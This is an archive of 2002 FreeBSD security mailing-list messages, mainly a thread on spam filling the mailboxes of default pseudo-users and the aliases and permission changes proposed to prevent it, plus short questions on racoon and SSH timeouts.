"news@victim.com" had somehow wound up on quite a few spammers' lists. He'd never used or hosted netnews, and so had no need for the pseudo-user. But that pseudo-user was there by default, and the system dutifully created a mailbox for him/her/it when the very first spam arrived. It started growing by leaps and bounds until it was -- I kid you not! -- several hundred megabytes in size. 
At which point the partition ran out of room. It seems to me that pseudo-users should be non-mailable, just as a basic security policy. Ideas for the best way to implement this in the default install? --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 17:14:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from edgemaster.zombie.org (ip68-13-69-9.om.om.cox.net [68.13.69.9]) by hub.freebsd.org (Postfix) with ESMTP id A554337B40D for ; Fri, 21 Jun 2002 17:14:35 -0700 (PDT) Received: by edgemaster.zombie.org (Postfix, from userid 1001) id 72B9266B04; Fri, 21 Jun 2002 19:14:35 -0500 (CDT) Date: Fri, 21 Jun 2002 19:14:35 -0500 From: Sean Kelly To: Brett Glass Cc: security@freebsd.org Subject: Re: Possible security liability: Filling disks with junk or spam Message-ID: <20020622001435.GA99704@edgemaster.zombie.org> References: <200206220001.SAA26010@lariat.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206220001.SAA26010@lariat.org> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jun 21, 2002 at 06:01:16PM -0600, Brett Glass wrote: ... > A client recently called me in puzzlement, saying that his system was > misbehaving, and it turned out that this was what had happened. The address > "news@victim.com" had somehow wound up on quite a few spammers' lists. He'd > never used or hosted netnews, and so had no need for the pseudo-user. But that > pseudo-user was there by default, and the system dutifully created a mailbox > for him/her/it when the very first spam arrived. It started growing by leaps > and bounds until it was -- I kid you not! -- several hundred megabytes in > size. At which point the partition ran out of room. 
> > It seems to me that pseudo-users should be non-mailable, just as a basic > security policy. Ideas for the best way to implement this in the default > install? If you look at /usr/src/etc/mail/aliases, you'll see that pseudo-users are mapped to root. I also see news in there: news: root usenet: news It seems to me that the best way to prevent such things happening would be to keep your aliases files up to date. Use mergemaster and also maintain the file for any pseudo-users you may add. At some point, the administrator has to become responsible for the system they administer. -- Sean Kelly | PGP KeyID: 77042C7B smkelly@zombie.org | http://www.zombie.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 17:34:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from web10104.mail.yahoo.com (web10104.mail.yahoo.com [216.136.130.54]) by hub.freebsd.org (Postfix) with SMTP id 7625137B408 for ; Fri, 21 Jun 2002 17:34:44 -0700 (PDT) Message-ID: <20020622003444.66667.qmail@web10104.mail.yahoo.com> Received: from [68.5.49.41] by web10104.mail.yahoo.com via HTTP; Fri, 21 Jun 2002 17:34:44 PDT Date: Fri, 21 Jun 2002 17:34:44 -0700 (PDT) From: twig les Subject: Re: Possible security liability: Filling disks with junk or spam To: Sean Kelly , Brett Glass Cc: security@freebsd.org In-Reply-To: <20020622001435.GA99704@edgemaster.zombie.org> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Would it be viable to un-map the psuedo-users or would that break something? --- Sean Kelly wrote: > On Fri, Jun 21, 2002 at 06:01:16PM -0600, Brett > Glass wrote: > ... 
> > A client recently called me in puzzlement, saying > that his system was > > misbehaving, and it turned out that this was what > had happened. The address > > "news@victim.com" had somehow wound up on quite a > few spammers' lists. He'd > > never used or hosted netnews, and so had no need > for the pseudo-user. But that > > pseudo-user was there by default, and the system > dutifully created a mailbox > > for him/her/it when the very first spam arrived. > It started growing by leaps > > and bounds until it was -- I kid you not! -- > several hundred megabytes in > > size. At which point the partition ran out of > room. > > > > It seems to me that pseudo-users should be > non-mailable, just as a basic > > security policy. Ideas for the best way to > implement this in the default > > install? > > If you look at /usr/src/etc/mail/aliases, you'll see > that pseudo-users are > mapped to root. I also see news in there: > news: root > > usenet: news > > > It seems to me that the best way to prevent such > things happening would be > to keep your aliases files up to date. Use > mergemaster and also maintain > the file for any pseudo-users you may add. At some > point, the > administrator has to become responsible for the > system they administer. > > -- > Sean Kelly | PGP KeyID: 77042C7B > smkelly@zombie.org | http://www.zombie.org > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of > the message ===== ----------------------------------------------------------- Only fools have all the answers. ----------------------------------------------------------- __________________________________________________ Do You Yahoo!? Yahoo! 
- Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 18: 6:48 2002 Delivered-To: freebsd-security@freebsd.org Received: from router.drapple.com (12-225-1-20.client.attbi.com [12.225.1.20]) by hub.freebsd.org (Postfix) with ESMTP id 8E74D37B405 for ; Fri, 21 Jun 2002 18:06:41 -0700 (PDT) Received: from work.drapple.com (work [192.168.1.10]) by router.drapple.com (8.9.3/8.9.3) with ESMTP id SAA07774; Fri, 21 Jun 2002 18:07:50 -0700 (PDT) (envelope-from mark@work.drapple.com) Message-ID: X-Mailer: XFMail 1.4.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <20020622003444.66667.qmail@web10104.mail.yahoo.com> Date: Fri, 21 Jun 2002 18:06:34 -0700 (PDT) From: Mark Hartley To: twig les Subject: Re: Possible security liability: Filling disks with junk or spam Cc: security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 22-Jun-02 twig les wrote: > Would it be viable to un-map the psuedo-users or would > that break something? > If you don't want to forward their messages to root (which I think is the best way), you could always simply edit the aliases file and put the following lines in: bin: /dev/null news: /dev/null (and so on for each one) Depends on how the admin wants to handle it. Mark. > > --- Sean Kelly wrote: >> On Fri, Jun 21, 2002 at 06:01:16PM -0600, Brett >> Glass wrote: >> ... >> > A client recently called me in puzzlement, saying >> that his system was >> > misbehaving, and it turned out that this was what >> had happened. The address >> > "news@victim.com" had somehow wound up on quite a >> few spammers' lists. 
He'd >> > never used or hosted netnews, and so had no need >> for the pseudo-user. But that >> > pseudo-user was there by default, and the system >> dutifully created a mailbox >> > for him/her/it when the very first spam arrived. >> It started growing by leaps >> > and bounds until it was -- I kid you not! -- >> several hundred megabytes in >> > size. At which point the partition ran out of >> room. >> > >> > It seems to me that pseudo-users should be >> non-mailable, just as a basic >> > security policy. Ideas for the best way to >> implement this in the default >> > install? >> >> If you look at /usr/src/etc/mail/aliases, you'll see >> that pseudo-users are >> mapped to root. I also see news in there: >> news: root >> >> usenet: news >> >> >> It seems to me that the best way to prevent such >> things happening would be >> to keep your aliases files up to date. Use >> mergemaster and also maintain >> the file for any pseudo-users you may add. At some >> point, the >> administrator has to become responsible for the >> system they administer. 
>> >> -- >> Sean Kelly | PGP KeyID: 77042C7B >> smkelly@zombie.org | http://www.zombie.org >> > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 19: 1:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from blues.jpj.net (blues.jpj.net [208.210.80.156]) by hub.freebsd.org (Postfix) with ESMTP id 0AAA237B404 for ; Fri, 21 Jun 2002 19:01:45 -0700 (PDT) Received: from blues.jpj.net (localhost.jpj.net [127.0.0.1]) by blues.jpj.net (8.12.3/8.12.3) with ESMTP id g5M21ZOa040442; Fri, 21 Jun 2002 22:01:35 -0400 (EDT) (envelope-from trevor@jpj.net) Received: from localhost (trevor@localhost) by blues.jpj.net (8.12.3/8.12.3/Submit) with ESMTP id g5M21Z63040439; Fri, 21 Jun 2002 22:01:35 -0400 (EDT) X-Authentication-Warning: blues.jpj.net: trevor owned process doing -bs Date: Fri, 21 Jun 2002 22:01:35 -0400 (EDT) From: Trevor Johnson To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: Possible security liability: Filling disks with junk or spam In-Reply-To: <200206220001.SAA26010@lariat.org> Message-ID: <20020621210455.F13586-100000@blues.jpj.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > A client recently called me in puzzlement, saying that his system was > misbehaving, and it turned out that this was what had happened. The address > "news@victim.com" had somehow wound up on quite a few spammers' lists. He'd > never used or hosted netnews, and so had no need for the pseudo-user. But that > pseudo-user was there by default, and the system dutifully created a mailbox > for him/her/it when the very first spam arrived. It started growing by leaps > and bounds until it was -- I kid you not! -- several hundred megabytes in > size. 
At which point the partition ran out of room. > > It seems to me that pseudo-users should be non-mailable, just as a basic > security policy. Ideas for the best way to implement this in the default > install? My reading of the RFCs (excerpts follow) is that the "news" and "usenet" addresses should receive mail when NNTP is in use. It seems like a task for the sysadmin. How about comments in /etc/inetd.conf along the lines of: # Enable e-mail to the "ftp" address if you turn this on (RFC 2142). #ftp stream tcp6 nowait root /usr/libexec/ftpd ftpd -l # # Enable e-mail to the "uucp" address if you turn this on (RFC 2142). #uucpd stream tcp nowait root /usr/libexec/uucpd uucpd # # Enable e-mail to "usenet" and "news" addresses if you turn this on (RFC 2142). #nntp stream tcp nowait usenet /usr/libexec/nntpd nntpd with the addresses commented out in /etc/aliases? Running "df" every few months wouldn't hurt, of course. 6.3. RESERVED ADDRESS It often is necessary to send mail to a site, without know- ing any of its valid addresses. For example, there may be mail system dysfunctions, or a user may wish to find out a person's correct address, at that site. --RFC 822 (URL:ftp://ftp.isi.edu/in-notes/rfc822.txt) 5.2.7 RCPT Command: RFC-821 Section 4.1.1 A host that supports a receiver-SMTP MUST support the reserved mailbox "Postmaster". --RFC 1123 (URL:ftp://ftp.isi.edu/in-notes/rfc1123.txt) Various Internet documents have specified mailbox names to be used when reaching the operators of the new service; for example, [RFC822 6.3, C.6] requires the presence of a mailbox name on all hosts that have an SMTP server. Other protocols have defacto standards for well known mailbox names, such as for NNTP (see [RFC977]), and for HTTP (see [HTTP]). Defacto standards also exist for well known mailbox names which have nothing to do with a particular protocol, e.g., and . [...] 5. 
SUPPORT MAILBOX NAMES FOR SPECIFIC INTERNET SERVICES For major Internet protocol services, there is a mailbox defined for receiving queries and reports. (Synonyms are included, here, due to their extensive installed base.) MAILBOX SERVICE SPECIFICATIONS ----------- ---------------- --------------------------- POSTMASTER SMTP [RFC821], [RFC822] HOSTMASTER DNS [RFC1033-RFC1035] USENET NNTP [RFC977] NEWS NNTP Synonym for USENET WEBMASTER HTTP [RFC 2068] WWW HTTP Synonym for WEBMASTER UUCP UUCP [RFC976] FTP FTP [RFC959] --RFC 2142 (URL:ftp://ftp.isi.edu/in-notes/rfc2142.txt) -- Trevor Johnson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 19:13: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from ns3.ideathcare.com (mail.allneo.com [216.185.96.68]) by hub.freebsd.org (Postfix) with SMTP id BF86237B407 for ; Fri, 21 Jun 2002 19:12:50 -0700 (PDT) Received: (qmail 73368 invoked by uid 85); 22 Jun 2002 02:17:04 -0000 Received: from jps@funeralexchange.com by ns3.ideathcare.com with qmail-scanner-1.03 (uvscan: v4.1.40/v4121. . Clean. 
Processed in 0.170925 secs); 22 Jun 2002 02:17:04 -0000 Received: from unknown (HELO funeralexchange.com) (216.185.99.194) by mail.allneo.com with SMTP; 22 Jun 2002 02:17:04 -0000 Received: from 66.171.47.179 (SquirrelMail authenticated user jps@funeralexchange.com) by webmail.allneo.com with HTTP; Fri, 21 Jun 2002 21:13:34 -0500 (CDT) Message-ID: <4086.66.171.47.179.1024712014.squirrel@webmail.allneo.com> Date: Fri, 21 Jun 2002 21:13:34 -0500 (CDT) Subject: Re: Possible security liability: Filling disks with junk or spam From: To: In-Reply-To: References: <20020622003444.66667.qmail@web10104.mail.yahoo.com> X-Priority: 3 Importance: Normal X-MSMail-Priority: Normal Cc: , X-Mailer: SquirrelMail (version 1.2.6) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Any competent admin would have these accounts already routed to another account preferably off the server or send them to /dev/null as Mark had suggested. I myself edit the aliases file to mark the accounts with a hostname (i.e. Root Server1 ) so I know which server its coming from and then forward all the mail to my personal account to review. From there you can have your mail client sort it out for you. I prefer not to delete ANY mail that is sent to me without myself looking it over. You can prevent lots of upcoming problems this way. Thanks Jeremy Suo-Anttila jps@funeralexchange.com > > On 22-Jun-02 twig les wrote: >> Would it be viable to un-map the psuedo-users or would >> that break something? >> > > If you don't want to forward their messages to root (which I think is > the best way), you could always simply edit the aliases file and put > the following lines in: > > bin: /dev/null > news: /dev/null > > (and so on for each one) > > > Depends on how the admin wants to handle it. 
> Mark.
>
>> --- Sean Kelly wrote:
>>> On Fri, Jun 21, 2002 at 06:01:16PM -0600, Brett Glass wrote:
>>> ...
>>> > A client recently called me in puzzlement, saying that his system was
>>> > misbehaving, and it turned out that this was what had happened. The address
>>> > "news@victim.com" had somehow wound up on quite a few spammers' lists. He'd
>>> > never used or hosted netnews, and so had no need for the pseudo-user. But that
>>> > pseudo-user was there by default, and the system dutifully created a mailbox
>>> > for him/her/it when the very first spam arrived. It started growing by leaps
>>> > and bounds until it was -- I kid you not! -- several hundred megabytes in
>>> > size. At which point the partition ran out of room.
>>> >
>>> > It seems to me that pseudo-users should be non-mailable, just as a basic
>>> > security policy. Ideas for the best way to implement this in the default
>>> > install?
>>>
>>> If you look at /usr/src/etc/mail/aliases, you'll see that pseudo-users are
>>> mapped to root. I also see news in there:
>>>
>>> news: root
>>> usenet: news
>>>
>>> It seems to me that the best way to prevent such things happening would be
>>> to keep your aliases files up to date. Use mergemaster and also maintain
>>> the file for any pseudo-users you may add. At some point, the
>>> administrator has to become responsible for the system they administer.
>>>
>>> --
>>> Sean Kelly | PGP KeyID: 77042C7B
>>> smkelly@zombie.org | http://www.zombie.org

From owner-freebsd-security Fri Jun 21 20:31:48 2002
Message-ID: <003301c2199d$3ff0c9e0$5dec910c@daleco>
From: "Kevin Kinsey, DaleCo, S.P."
To: "Brett Glass"
References: <200206220001.SAA26010@lariat.org>
Subject: Re: Possible security liability: Filling disks with junk or spam
Date: Fri, 21 Jun 2002 22:31:08 -0500

I wrote several paragraphs and deleted them. This may suffice:

"Pretty much everything else in this file points to root, so you would do
well in either reading root's email or forwarding root's email from here."

If your client doesn't do this, maybe that's a bad thing(tm) or maybe it's
just your job security...

I try to avoid the "When panicked break Glass" bandwagon, but this doesn't
compute for me.

Kevin Kinsey, DaleCo, S.P.
----- Original Message -----
From: "Brett Glass"
Sent: Friday, June 21, 2002 7:01 PM
Subject: Possible security liability: Filling disks with junk or spam

> Two years ago, at BSDCon, I reported on a form of abuse known as a
> "Rumplestiltskin attack," in which an attacker guessed names in rapid
> succession so as to find valid e-mail addresses to spam. Well, as it turns
> out, one doesn't need to do this to find addresses on FreeBSD systems that can
> be filled with mail. /etc/passwd contains quite a few pseudo-users which, if
> mailed, cause the mail to be stored on the disk as if it were addressed to a
> real user. No one may ever read it, but it's possible to fill the partition
> and thereby wreak havoc.
>
> A client recently called me in puzzlement, saying that his system was
> misbehaving, and it turned out that this was what had happened. The address
> "news@victim.com" had somehow wound up on quite a few spammers' lists. He'd
> never used or hosted netnews, and so had no need for the pseudo-user. But that
> pseudo-user was there by default, and the system dutifully created a mailbox
> for him/her/it when the very first spam arrived. It started growing by leaps
> and bounds until it was -- I kid you not! -- several hundred megabytes in
> size. At which point the partition ran out of room.
>
> It seems to me that pseudo-users should be non-mailable, just as a basic
> security policy. Ideas for the best way to implement this in the default
> install?
>
> --Brett Glass

From owner-freebsd-security Fri Jun 21 20:36:05 2002
Message-ID: <004301c2199d$dbacf3e0$5dec910c@daleco>
From: "Kevin Kinsey, DaleCo, S.P."
To: "Mark Hartley", "twig les"
Subject: Re: Possible security liability: Filling disks with junk or spam
Date: Fri, 21 Jun 2002 22:35:29 -0500

Better yet, comment out the lines in /etc/aliases, which will cause the
mail to be returned since that user won't exist.

Why increase the spam traffic by the use of the bitbucket? If the mail
doesn't come back they just keep sending......

Kevin Kinsey

----- Original Message -----
From: "Mark Hartley"
To: "twig les"
Sent: Friday, June 21, 2002 8:06 PM
Subject: Re: Possible security liability: Filling disks with junk or spam

>
> On 22-Jun-02 twig les wrote:
> > Would it be viable to un-map the pseudo-users or would
> > that break something?
> >
>
> If you don't want to forward their messages to root (which I think is the best
> way), you could always simply edit the aliases file and put the following lines
> in:
>
> bin: /dev/null
> news: /dev/null
>
> (and so on for each one)
>
> Depends on how the admin wants to handle it.
>
> Mark.
>
> >
> > --- Sean Kelly wrote:
> >> On Fri, Jun 21, 2002 at 06:01:16PM -0600, Brett Glass wrote:
> >> ...
> >> > A client recently called me in puzzlement, saying that his system was
> >> > misbehaving, and it turned out that this was what had happened. The address
> >> > "news@victim.com" had somehow wound up on quite a few spammers' lists. He'd
> >> > never used or hosted netnews, and so had no need for the pseudo-user. But that
> >> > pseudo-user was there by default, and the system dutifully created a mailbox
> >> > for him/her/it when the very first spam arrived. It started growing by leaps
> >> > and bounds until it was -- I kid you not! -- several hundred megabytes in
> >> > size. At which point the partition ran out of room.
> >> >
> >> > It seems to me that pseudo-users should be non-mailable, just as a basic
> >> > security policy. Ideas for the best way to implement this in the default
> >> > install?
> >>
> >> If you look at /usr/src/etc/mail/aliases, you'll see that pseudo-users are
> >> mapped to root. I also see news in there:
> >>
> >> news: root
> >> usenet: news
> >>
> >> It seems to me that the best way to prevent such things happening would be
> >> to keep your aliases files up to date. Use mergemaster and also maintain
> >> the file for any pseudo-users you may add. At some point, the
> >> administrator has to become responsible for the system they administer.
> >>
> >> --
> >> Sean Kelly | PGP KeyID: 77042C7B
> >> smkelly@zombie.org | http://www.zombie.org
> >

From owner-freebsd-security Fri Jun 21 20:59:50 2002
Date: Fri, 21 Jun 2002 20:59:46 -0700 (PDT)
From: Matthew Dillon
Message-Id: <200206220359.g5M3xkSl066466@apollo.backplane.com>
To: Brett Glass
Cc: security@FreeBSD.ORG
Subject: Re: Possible security liability: Filling disks with junk or spam
References: <200206220001.SAA26010@lariat.org>

    This is rich.  I just checked my own system and guess what I found?

    -rw-------  1 ftp   dillon    11244 Apr  3  2001 ftp
    -rw-rw----  1 man   mail     765638 Jun 18 22:23 man

    ding ding ding ding!  Give that man a cigar!  All spam.

:Two years ago, at BSDCon, I reported on a form of abuse known as a
:"Rumplestiltskin attack," in which an attacker guessed names in rapid
:...
:mailed, cause the mail to be stored on the disk as if it were addressed to a
:real user. No one may ever read it, but it's possible to fill the partition
:and thereby wreak havoc.
:
:It seems to me that pseudo-users should be non-mailable, just as a basic
:security policy. Ideas for the best way to implement this in the default
:install?
:
:--Brett Glass

    I think for now the easiest thing to do is to adjust the default
    mail aliases file to /dev/null out pseudo users that come preinstalled
    in /etc/passwd.

                                        -Matt
                                        Matthew Dillon

From owner-freebsd-security Fri Jun 21 21:40:31 2002
Message-ID: <3D13FFB2.39A80570@pantherdragon.org>
Date: Fri, 21 Jun 2002 21:40:19 -0700
From: Darren Pilgrim
To: "Kevin Kinsey, DaleCo, S.P."
Cc: Mark Hartley, twig les, security@FreeBSD.ORG
Subject: Re: Possible security liability: Filling disks with junk or spam
References: <004301c2199d$dbacf3e0$5dec910c@daleco>

"Kevin Kinsey, DaleCo, S.P." wrote:
>
> Better yet, comment out the lines in /etc/aliases,
> which will cause the mail to be returned
> since that user won't exist.
>
> Why increase the spam traffic by the use
> of the bitbucket?
> If the mail doesn't come
> back they just keep sending......

Without the aliases(5) entries, the mail will be delivered to local
mailboxes for those pseudo-users, eventually filling the disk if you
don't monitor disk usage. This was precisely the problem for Brett's
client. IMO the proper way to handle this is to use an MTA that has
some kind of access-control mechanism to restrict mail delivery to
non-user accounts in addition to having a forwarding mechanism for
them.

From owner-freebsd-security Fri Jun 21 21:56:04 2002
Message-ID: <20020622045559.41921.qmail@web10106.mail.yahoo.com>
Date: Fri, 21 Jun 2002 21:55:59 -0700 (PDT)
From: twig les
Subject: Re: Possible security liability: Filling disks with junk or spam
To: Darren Pilgrim, "Kevin Kinsey, DaleCo, S.P."
Cc: Mark Hartley, twig les, security@FreeBSD.ORG
In-Reply-To: <3D13FFB2.39A80570@pantherdragon.org>

When I asked if it would break something to forward those accounts' mail
to /dev/null instead of root, I meant: do those pseudo-users actually
send anything via mail or everything via syslog? Excuse the strange
question, I'm a pseudo-admin (aka user).

--- Darren Pilgrim wrote:
> "Kevin Kinsey, DaleCo, S.P."
> wrote:
> >
> > Better yet, comment out the lines in /etc/aliases,
> > which will cause the mail to be returned
> > since that user won't exist.
> >
> > Why increase the spam traffic by the use
> > of the bitbucket? If the mail doesn't come
> > back they just keep sending......
>
> Without the aliases(5) entries, the mail will be delivered to local
> mailboxes for those pseudo-users, eventually filling the disk if you
> don't monitor disk usage. This was precisely the problem for Brett's
> client. IMO the proper way to handle this is to use an MTA that has
> some kind of access-control mechanism to restrict mail delivery to
> non-user accounts in addition to having a forwarding mechanism for
> them.

=====
-----------------------------------------------------------
Only fools have all the answers.
-----------------------------------------------------------

From owner-freebsd-security Fri Jun 21 22:13:14 2002
Message-ID: <02b801c219ab$6d28fd20$5dec910c@daleco>
From: "Kevin Kinsey, DaleCo, S.P."
Subject: Re: Possible security liability: Filling disks with junk or spam
Date: Sat, 22 Jun 2002 00:12:37 -0500

> ----- Original Message -----
> From: "Darren Pilgrim"
> To: "Kevin Kinsey, DaleCo, S.P."
> Cc: "Mark Hartley"; "twig les"
> Sent: Friday, June 21, 2002 11:40 PM
> Subject: Re: Possible security liability: Filling disks with junk or spam
>
> > "Kevin Kinsey, DaleCo, S.P." wrote:
> > >
> > > Better yet, comment out the lines in /etc/aliases,
> > > which will cause the mail to be returned
> > > since that user won't exist.
> > >
> > > Why increase the spam traffic by the use
> > > of the bitbucket? If the mail doesn't come
> > > back they just keep sending......
> >
> > Without the aliases(5) entries, the mail will be delivered
> to local mailboxes for those pseudo-users, eventually
> filling the disk if you don't monitor disk usage. This was
> precisely the problem for Brett's client. <

Doh! Indeed it does.......though I had to reconfig a basically default
/etc/aliases to get it to do this...

> >IMO the proper way to handle this is to use an MTA
> that has some kind of access-control mechanism to
> restrict mail delivery to non-user accounts in addition to
> having a forwarding mechanism for them.<

Seems reasonable. Or just do as /etc/aliases instructed in the first
place...why do we only complain when caught in violation of our own
policies?
KDK

From owner-freebsd-security Fri Jun 21 22:14:51 2002
Date: Sat, 22 Jun 2002 00:14:43 -0500
From: Sean Kelly
To: twig les
Cc: Darren Pilgrim, "Kevin Kinsey, DaleCo, S.P.", Mark Hartley, security@FreeBSD.ORG
Subject: Re: Possible security liability: Filling disks with junk or spam
Message-ID: <20020622051443.GA31072@edgemaster.zombie.org>
References: <3D13FFB2.39A80570@pantherdragon.org> <20020622045559.41921.qmail@web10106.mail.yahoo.com>
In-Reply-To: <20020622045559.41921.qmail@web10106.mail.yahoo.com>

On Fri, Jun 21, 2002 at 09:55:59PM -0700, twig les wrote:
> When I asked if it would break something to forward
> those accounts' mail to /dev/null instead of root, I
> meant: do those pseudo-users actually send anything
> via mail or everything via syslog? Excuse the strange
> question, I'm a pseudo-admin (aka user).

Having a username aliased to /dev/null doesn't affect the transmission of
mail from that user. Even if there is a daemon that sends mail as that
user, the mail will be delivered. The problem arises when there is
important incoming mail, such as bounces and errors or alerts. Whether a
specific pseudo-user needs to receive mail depends on your particular
configuration and needs.
If I were running a news server, I'd want to receive mail sent to news@.

> --- Darren Pilgrim wrote:
> > "Kevin Kinsey, DaleCo, S.P." wrote:
> > >
> > > Better yet, comment out the lines in /etc/aliases,
> > > which will cause the mail to be returned
> > > since that user won't exist.
> > >
> > > Why increase the spam traffic by the use
> > > of the bitbucket? If the mail doesn't come
> > > back they just keep sending......
> >
> > Without the aliases(5) entries, the mail will be delivered to local
> > mailboxes for those pseudo-users, eventually filling the disk if you
> > don't monitor disk usage. This was precisely the problem for Brett's
> > client. IMO the proper way to handle this is to use an MTA that has
> > some kind of access-control mechanism to restrict mail delivery to
> > non-user accounts in addition to having a forwarding mechanism for
> > them.
>
> =====
> -----------------------------------------------------------
> Only fools have all the answers.
> -----------------------------------------------------------
--
Sean Kelly | PGP KeyID: 77042C7B
smkelly@zombie.org | http://www.zombie.org

From owner-freebsd-security Sat Jun 22 00:27:23 2002
Date: Sat, 22 Jun 2002 09:27:03 +0200 (CEST)
From: Joachim Griesche
Message-Id: <200206220727.g5M7R3T06825@bsd.ist-ffo.de>
To: freebsd-security@freebsd.org
Subject: Forwarding mail to /dev/null

Hello!

From my point of view, forwarding e-mails to /dev/null violates some basic
assumptions on how an MTA should work. The following has been taken from
/usr/share/doc/smm/09.sendmail/paper.ascii.gz:

    2) Reliability, in the sense of guaranteeing that every message is
       correctly delivered or at least brought to the attention of a
       human for correct disposal; no message should ever be completely
       lost.

If you don't have a service, you don't need the corresponding pseudo-user.
If you have the service, RFC 2142 requires you to have the corresponding
e-mail address, and root should glance at the e-mails arrived. (RFC 2142
has already been cited on the list.)
With best regards
Joachim Griesche

Network administrator
Institut fuer Solartechnologien GmbH
Frankfurt (Oder), Germany

From owner-freebsd-security Sat Jun 22 00:51:04 2002
Date: Sat, 22 Jun 2002 09:50:13 +0200
From: "Simon 'corecode' Schubert"
To: Darren Pilgrim
Cc: kdk@daleco.biz, mark@work.drapple.com, twigles@yahoo.com, security@FreeBSD.ORG
Subject: Re: Possible security liability: Filling disks with junk or spam
Message-Id: <20020622095013.40db50a3.corecode@corecode.ath.cx>
In-Reply-To: <3D13FFB2.39A80570@pantherdragon.org>
References: <004301c2199d$dbacf3e0$5dec910c@daleco> <3D13FFB2.39A80570@pantherdragon.org>

On Fri, 21 Jun 2002 21:40:19 -0700
Darren Pilgrim wrote:
> "Kevin Kinsey, DaleCo, S.P." wrote:
> > Better yet, comment out the lines in /etc/aliases,
> > which will cause the mail to be returned
> > since that user won't exist.
> >
> > Why increase the spam traffic by the use
> > of the bitbucket? If the mail doesn't come
> > back they just keep sending......
> Without the aliases(5) entries, the mail will be delivered to local
> mailboxes for those pseudo-users, eventually filling the disk if you
> don't monitor disk usage. This was precisely the problem for Brett's
> client. IMO the proper way to handle this is to use an MTA that has
> some kind of access-control mechanism to restrict mail delivery to
> non-user accounts in addition to having a forwarding mechanism for
> them.

to my knowledge this can be easily achieved by (manually) changing the
permissions of the spool files:

chown 0.0 /var/mail/news
chmod 400 /var/mail/news

et voila! mail can't be delivered and bounces (tho postmaster@ might get
an annoying message :)

cheerz
  simon

--
/"\   http://corecode.ath.cx/#donate
\ /
 \     ASCII Ribbon Campaign
/ \  Against HTML Mail and News

From owner-freebsd-security Sat Jun 22 03:02:36 2002
Date: Sat, 22 Jun 2002 05:03:53 -0500
From: Nick Slager
To: cjclark@alum.mit.edu
Cc: security@freebsd.org
Subject: Re: Configuring sainfo in racoon(8)
Message-ID:
<20020622050353.A35129@zith.net>
References: <20020618130547.A11688@blossom.cjclark.org>
In-Reply-To: <20020618130547.A11688@blossom.cjclark.org>; from crist.clark@attbi.com on Tue, Jun 18, 2002 at 01:05:47PM -0700

Thus spake Crist J. Clark (crist.clark@attbi.com):

> my_identifier user_fqdn "cjc@mydomain.org";
> peer_identifier user_fqdn "cjc@mydomain.org";
> ...
> }
>
> sainfo user_fqdn "cjc@mydomain.org" user_fqdn "cjc@mydomain.org" {
> ...
> }

Your specified sainfo stanza isn't matching (to state the bleedin' obvious,
as John Cleese would say). Perhaps this misses the point of what you're
trying to do, but is there some reason you have to use user_fqdn
identifiers? Try using:

my_identifier address;

and change your sainfo stanza to reflect that address.
Regards,

Nick

From owner-freebsd-security Sat Jun 22 03:57:12 2002
Date: Sat, 22 Jun 2002 12:57:13 +0200
From: Krzysztof Zaraska
To: freebsd-security@freebsd.org
Subject: Apache FreeBSD exploit released
Message-Id: <20020622125713.547c2546.kzaraska@student.uci.agh.edu.pl>

For those of you who do not read bugtraq, GOBBLES have posted a new version
of their apache exploit which is said to support also Net and FreeBSD.

--
// Krzysztof Zaraska * kzaraska (at) student.uci.agh.edu.pl
// Prelude IDS: http://www.prelude-ids.org/
// A dream will always triumph over reality, once it is given the chance.
// -- Stanislaw Lem

From owner-freebsd-security Sat Jun 22 04:34:26 2002
To: Lawrence Sica
Cc: twig les, freebsd-security@FreeBSD.ORG
Subject: Re: SSH timeout settings
References: <20020620214512.42806.qmail@web10101.mail.yahoo.com> <3D1281DE.5000804@earthlink.net>
From: Dan Pelleg
Date: 22 Jun 2002 07:33:37 -0400
In-Reply-To: <3D1281DE.5000804@earthlink.net>

Lawrence Sica writes:

> twig les wrote:
> > Hey all, I think this is an easy one masquerading as a
> > tough one.... My OpenSSH on my Free 4.4 Release box
> > just lets me keep an open session indefinitely without
> > any activity. I've read man sshd and all sorts of
> > other things but no mention.
